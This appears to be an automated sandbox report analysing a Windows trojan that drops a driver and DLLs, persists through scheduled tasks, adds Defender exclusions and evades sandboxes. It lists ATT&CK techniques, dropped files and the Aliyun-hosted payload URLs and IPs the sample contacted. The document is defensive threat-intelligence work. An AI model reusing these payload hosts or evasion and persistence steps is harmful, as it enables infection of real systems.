                Windows Service                		41
                Obfuscated Files or Information                		NTDS5
                File and Directory Discovery                		Distributed Component Object ModelInput Capture2
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                Process Injection                		111
                Software Packing                		LSA Secrets224
                System Information Discovery                		SSHKeylogging3
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                Scheduled Task/Job                		1
                DLL Side-Loading                		Cached Domain Credentials341
                Security Software Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                Registry Run Keys / Startup Folder                		32
                Masquerading                		DCSync21
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Modify Registry                		Proc Filesystem3
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                Virtualization/Sandbox Evasion                		/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                Access Token Manipulation                		Network Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd12
                Process Injection                		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588710 Sample: 2976587-987347589.07.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 85 upitem.oss-cn-hangzhou.aliyuncs.com 2->85 87 sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com 2->87 89 8 other IPs or domains 2->89 101 Suricata IDS alerts for network traffic 2->101 103 Malicious sample detected (through community Yara rule) 2->103 105 Antivirus detection for dropped file 2->105 107 12 other signatures 2->107 9 l0tiFM.exe 25 2->9         started        14 2976587-987347589.07.exe 1 24 2->14         started        16 lBoqoqIC.exe 2->16         started        18 12 other processes 2->18 signatures3 process4 dnsIp5 95 sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com 118.178.60.9, 443, 49737, 49764 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 9->95 67 C:\Program Files (x86)\DfP1K3\tbcore3U.dll, PE32 9->67 dropped 69 C:\Program Files (x86)\DfP1K3\DfP1K3.exe, PE32 9->69 dropped 81 7 other files (6 malicious) 9->81 dropped 121 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 9->121 123 Found direct / indirect Syscall (likely to bypass EDR) 9->123 20 DfP1K3.exe 10 26 9->20         started        25 cmd.exe 1 9->25         started        27 cmd.exe 1 9->27         started        35 2 other processes 9->35 97 sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com 39.103.20.105, 443, 49708, 49709 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 14->97 71 C:\Windows\System32\drivers\189atohci.sys, PE32+ 14->71 dropped 73 C:\Users\user\Documents\vselog.dll, PE32+ 14->73 dropped 75 C:\Users\user\Documents\l0tiFM.exe, PE32+ 14->75 dropped 83 4 other malicious files 14->83 dropped 125 Drops PE files to the document folder of the user 14->125 127 Sample is not signed and drops a device driver 14->127 129 Writes many files with high entropy 14->129 131 Tries to detect virtualization through RDTSC time measurements 14->131 77 C:\ProgramData\atBs3ba9\d0oKoK2T.exe, PE32+ 16->77 dropped 79 C:\Users\user\AppData\...\page-404[1].png, PNG 16->79 dropped 133 Found evasive API chain (may stop execution after checking mutex) 16->133 135 Found stalling execution ending in API Sleep call 16->135 99 38.45.124.13, 49995, 49996, 8050 COGENT-174US United States 18->99 137 Antivirus detection for dropped file 18->137 139 Machine Learning detection for dropped file 18->139 141 Found strings related to Crypto-Mining 18->141 143 2 other signatures 18->143 29 reg.exe 1 1 18->29         started        31 reg.exe 1 1 18->31         started        33 reg.exe 1 1 18->33         started        37 5 other processes 18->37 file6 signatures7 process8 dnsIp9 91 8.210.66.183, 49988, 8917 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC Singapore 20->91 93 sc-29h5.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com 118.178.60.103, 443, 49990, 49991 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 20->93 59 C:\ProgramData\efk2JUeS\lBoqoqIC.exe, PE32 20->59 dropped 61 C:\ProgramData\53jGFr5v.exe, PE32 20->61 dropped 63 C:\Program Files (x86)\...\tbcore3U.dll, PE32 20->63 dropped 65 9 other malicious files 20->65 dropped 109 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 20->109 111 Creates an undocumented autostart registry key 20->111 113 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 20->113 39 cmd.exe 20->39         started        115 Uses cmd line tools excessively to alter registry or file data 25->115 117 Uses schtasks.exe or at.exe to add and modify task schedules 25->117 41 conhost.exe 25->41         started        43 schtasks.exe 1 25->43         started        51 2 other processes 25->51 45 conhost.exe 27->45         started        53 3 other processes 27->53 119 Adds extensions / path to Windows Defender exclusion list (Registry) 29->119 47 conhost.exe 35->47         started        49 conhost.exe 35->49         started        55 6 other processes 35->55 file10 signatures11 process12 process13 57 conhost.exe 39->57         started       

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                2976587-987347589.07.exe5%ReversingLabs
                2976587-987347589.07.exe15%VirustotalBrowse

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\ProgramData\53jGFr5v.exe100%AviraHEUR/AGEN.1315326
                C:\ProgramData\atBs3ba9\d0oKoK2T.exe100%AviraHEUR/AGEN.1314683
                C:\Program Files (x86)\DfP1K3\tbcore3U.dll100%AviraTR/Redcap.vdzex
                C:\Program Files (x86)\3q7mMte5\tbcore3U.dll100%AviraTR/Redcap.vdzex
                C:\ProgramData\53jGFr5v.exe100%Joe Sandbox ML
                C:\ProgramData\atBs3ba9\d0oKoK2T.exe100%Joe Sandbox ML
                C:\Program Files (x86)\DfP1K3\tbcore3U.dll100%Joe Sandbox ML
                C:\Program Files (x86)\3q7mMte5\tbcore3U.dll100%Joe Sandbox ML
                C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exe0%ReversingLabs
                C:\Program Files (x86)\DfP1K3\DfP1K3.exe0%ReversingLabs
                C:\Users\Public\Music\destopbak.ini0%ReversingLabs
                C:\Users\user\Documents\l0tiFM.exe0%ReversingLabs

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://page-404.png0%Avira URL Cloudsafe
                http://www.indigorose.com/route.php?pid=suf60buy0%Avira URL Cloudsafe
                http://cinskw.net:6090/licensecinskw.net0%Avira URL Cloudsafe
                http://cinskw.net:6090/license0%Avira URL Cloudsafe
                https://662hfg.oss-cn-beijing.aliyuncs.com/z0%Avira URL Cloudsafe
                http://schemas.microsoft.c0%Avira URL Cloudsafe
                https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-510%Avira URL Cloudsafe
                https://upitem.oss-cn-hangzhou.aliyuncs.com/page-404.png%95b90%Avira URL Cloudsafe
                https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr3.png3H0%Avira URL Cloudsafe
                https://662hfg.oss-cn-beijing.aliyuncs.com/s.jpg0%Avira URL Cloudsafe
                https://662hfg.oss-cn-beijing.aliyuncs.com/v0%Avira URL Cloudsafe
                https://662hfg.oss-cn-beijing.aliyuncs.com/7-2476756634-1003F0%Avira URL Cloudsafe
                https://upitem.oss-cn-hangzhou.aliyuncs.com/page-404.pngck0%Avira URL Cloudsafe
                https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifB0%Avira URL Cloudsafe
                https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.pngvI0%Avira URL Cloudsafe
                http://schemas.microso0%Avira URL Cloudsafe
                https://662hfg.oss-cn-beijing.aliyuncs.com/0%Avira URL Cloudsafe
                https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.png30%Avira URL Cloudsafe
                https://upitem.oss-cn-hangzhou.aliyuncs.com/0%Avira URL Cloudsafe
                https://662hfg.oss-cn-beijing.aliyuncs.com/a.gif0%Avira URL Cloudsafe
                https://upitem.oss-cn-hangzhou.aliyuncs.com/extra-task2.pngI0%Avira URL Cloudsafe
                https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.pngXH0%Avira URL Cloudsafe
                https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.pngiH0%Avira URL Cloudsafe
                https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.png0%Avira URL Cloudsafe
                https://662hfg.oss-cn-beijing.aliyuncs.com/b.gif0%Avira URL Cloudsafe
                https://upitem.oss-cn-hangzhou.aliyuncs.com/D0%Avira URL Cloudsafe
                https://662hfg.oss-cn-beijing.aliyuncs.com/s.dat0%Avira URL Cloudsafe
                https://662hfg.oss-cn-beijing.aliyuncs.com/i.dat0%Avira URL Cloudsafe
                https://upitem.oss-cn-hangzhou.aliyuncs.com/page-404.png-0%Avira URL Cloudsafe
                https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr3.pngfH0%Avira URL Cloudsafe
                https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr2.png0%Avira URL Cloudsafe
                https://upitem.oss-cn-hangzhou.aliyuncs.com/page-404.png0%Avira URL Cloudsafe
                https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr3.png0%Avira URL Cloudsafe
                https://662hfg.oss-cn-beijing.aliyuncs.com/c.gif0%Avira URL Cloudsafe
                https://upitem.oss-cn-hangzhou.aliyuncs.com/N0%Avira URL Cloudsafe
                https://upitem.oss-cn-hangzhou.aliyuncs.com/extra-task2.png0%Avira URL Cloudsafe
                https://662hfg.oss-cn-beijing.aliyuncs.com/b0%Avira URL Cloudsafe
                https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.png2I0%Avira URL Cloudsafe
                https://662hfg.oss-cn-beijing.aliyuncs.com/d.gif0%Avira URL Cloudsafe
                https://662hfg.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1003F0%Avira URL Cloudsafe
                https://662hfg.oss-cn-beijing.aliyuncs.com/d.gifn0%Avira URL Cloudsafe
                https://662hfg.oss-cn-beijing.aliyuncs.com/7-2476756634-10030%Avira URL Cloudsafe
                https://upitem.oss-cn-hangzhou.aliyuncs.com/m0%Avira URL Cloudsafe
                https://upitem.oss-cn-hangzhou.aliyuncs.com/page-404.pngT0%Avira URL Cloudsafe
                https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr3.png;0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com
                		118.178.60.9
                		truefalse
                  		high
                  sc-29h5.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com
                  		118.178.60.103
                  		truefalse
                    		high
                    sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com
                    		39.103.20.105
                    		truefalse
                      		unknown
                      gqsqoq.net
                      		unknown
                      		unknownfalse
                        		unknown
                        upitem.oss-cn-hangzhou.aliyuncs.com
                        		unknown
                        		unknownfalse
                          		unknown
                          662hfg.oss-cn-beijing.aliyuncs.com
                          		unknown
                          		unknownfalse
                            		unknown
                            22mm.oss-cn-hangzhou.aliyuncs.com
                            		unknown
                            		unknownfalse
                              		high

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              https://662hfg.oss-cn-beijing.aliyuncs.com/s.jpgfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpgfalse
                                		high
                                https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpgfalse
                                  		high
                                  https://662hfg.oss-cn-beijing.aliyuncs.com/a.giffalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpgfalse
                                    		high
                                    https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgfalse
                                      		high
                                      https://662hfg.oss-cn-beijing.aliyuncs.com/b.giffalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.pngfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://662hfg.oss-cn-beijing.aliyuncs.com/s.datfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://662hfg.oss-cn-beijing.aliyuncs.com/i.datfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr2.pngfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://upitem.oss-cn-hangzhou.aliyuncs.com/page-404.pngfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr3.pngfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://662hfg.oss-cn-beijing.aliyuncs.com/c.giffalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://upitem.oss-cn-hangzhou.aliyuncs.com/extra-task2.pngfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgfalse
                                        		high
                                        https://662hfg.oss-cn-beijing.aliyuncs.com/d.giffalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://22mm.oss-cn-hangzhou.aliyuncs.com/f.datfalse
                                          		high

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr3.png3HDfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://www.indigorose.com/route.php?pid=suf60buylBoqoqIC.exe, 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51l0tiFM.exe, 00000007.00000003.2330226957.0000000003CFA000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://cinskw.net:6090/licensecinskw.netlBoqoqIC.exe, 00000031.00000002.3351620022.00000000030EF000.00000004.00000010.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://%s/%d.dllDfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://page-404.pnglBoqoqIC.exe, 00000031.00000002.3351388145.0000000002D2A000.00000004.00000010.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://cinskw.net:6090/licenselBoqoqIC.exe, 00000031.00000002.3351620022.00000000030EF000.00000004.00000010.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://662hfg.oss-cn-beijing.aliyuncs.com/z2976587-987347589.07.exe, 00000000.00000003.1954802262.0000000000D27000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://%s/%d.dllC:DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://schemas.microsoft.cDfP1K3.exe, 0000002A.00000002.3348166976.0000000000B16000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://upitem.oss-cn-hangzhou.aliyuncs.com/page-404.png%95b9lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002BB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://662hfg.oss-cn-beijing.aliyuncs.com/v2976587-987347589.07.exe, 00000000.00000003.1936053133.0000000000D27000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954802262.0000000000D27000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://662hfg.oss-cn-beijing.aliyuncs.com/7-2476756634-1003F2976587-987347589.07.exe, 00000000.00000003.1954802262.0000000000D27000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://schemas.microsolBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://662hfg.oss-cn-beijing.aliyuncs.com/a.gifB2976587-987347589.07.exe, 00000000.00000003.1935998840.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.2003088964.0000000000D6A000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954749975.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://upitem.oss-cn-hangzhou.aliyuncs.com/page-404.pngcklBoqoqIC.exe, 00000031.00000002.3348959801.0000000000766000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://662hfg.oss-cn-beijing.aliyuncs.com/2976587-987347589.07.exe, 00000000.00000003.1954802262.0000000000D27000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954802262.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954802262.0000000000D10000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1936053133.0000000000D0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://crl.thawte.com/ThawteTimestampingCA.crl0l0tiFM.exe.0.dr, 189atohci.sys.0.drfalse
                                                		high
                                                https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.pngvIDfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.png3DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://upitem.oss-cn-hangzhou.aliyuncs.com/lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://upitem.oss-cn-hangzhou.aliyuncs.com/extra-task2.pngIDfP1K3.exe, 0000002A.00000002.3348166976.0000000000B6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.pngiHDfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.pngXHDfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://ocsp.thawte.com0l0tiFM.exe.0.dr, 189atohci.sys.0.drfalse
                                                  		high
                                                  https://upitem.oss-cn-hangzhou.aliyuncs.com/DDfP1K3.exe, 0000002A.00000002.3348166976.0000000000B6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://upitem.oss-cn-hangzhou.aliyuncs.com/page-404.png-lBoqoqIC.exe, 00000031.00000002.3348959801.0000000000786000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr3.pngfHDfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.symauth.com/cps0(l0tiFM.exe.0.drfalse
                                                    		high
                                                    https://upitem.oss-cn-hangzhou.aliyuncs.com/NlBoqoqIC.exe, 00000031.00000002.3348959801.0000000000786000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://%s/upx.rarC:DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://%s/ip.txtC:DfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.symauth.com/rpa00l0tiFM.exe.0.drfalse
                                                          		high
                                                          https://662hfg.oss-cn-beijing.aliyuncs.com/b2976587-987347589.07.exe, 00000000.00000003.2003088964.0000000000D40000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954749975.0000000000D38000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr1.png2IDfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://%s/ip.txtDfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://662hfg.oss-cn-beijing.aliyuncs.com/1-2246122658-3693405117-2476756634-1003F2976587-987347589.07.exe, 00000000.00000003.1936053133.0000000000D27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://662hfg.oss-cn-beijing.aliyuncs.com/d.gifn2976587-987347589.07.exe, 00000000.00000003.2003088964.0000000000D6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://662hfg.oss-cn-beijing.aliyuncs.com/7-2476756634-10032976587-987347589.07.exe, 00000000.00000003.1936053133.0000000000D27000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954802262.0000000000D27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://%s/upx.rarDfP1K3.exe, 0000002A.00000002.3354834824.000000001002D000.00000004.00001000.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003A50000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://upitem.oss-cn-hangzhou.aliyuncs.com/nDfP1K3.exe, 0000002A.00000002.3348166976.0000000000B6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://upitem.oss-cn-hangzhou.aliyuncs.com/mlBoqoqIC.exe, 00000031.00000002.3351191479.0000000002AF0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://upitem.oss-cn-hangzhou.aliyuncs.com/page-404.pngTlBoqoqIC.exe, 00000031.00000002.3348959801.0000000000786000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://upitem.oss-cn-hangzhou.aliyuncs.com/dsb-hr3.png;DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                8.210.66.183
                                                                		unknownSingapore
                                                                		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                39.103.20.105
                                                                		sc-2ixf.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.comChina
                                                                		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                                118.178.60.9
                                                                		sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comChina
                                                                		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                                38.45.124.13
                                                                		unknownUnited States
                                                                		174COGENT-174USfalse
                                                                118.178.60.103
                                                                		sc-29h5.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.comChina
                                                                		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse

                                                                General Information

                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1588710
                                                                Start date and time:2025-01-11 04:40:30 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 12m 6s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Run name:Run with higher sleep bypass
                                                                Number of analysed new started processes analysed:53
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:2976587-987347589.07.exe
                                                                Detection:MAL
                                                                Classification:mal100.rans.troj.evad.mine.winEXE@68/43@16/5
                                                                EGA Information:
                                                                • Successful, ratio: 80%
                                                                HCA Information:
                                                                • Successful, ratio: 77%
                                                                • Number of executed functions: 132
                                                                • Number of non-executed functions: 248
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                04:42:36Task SchedulerRun new task: 7Pmyv path: C:\Users\user\Documents\l0tiFM.exe
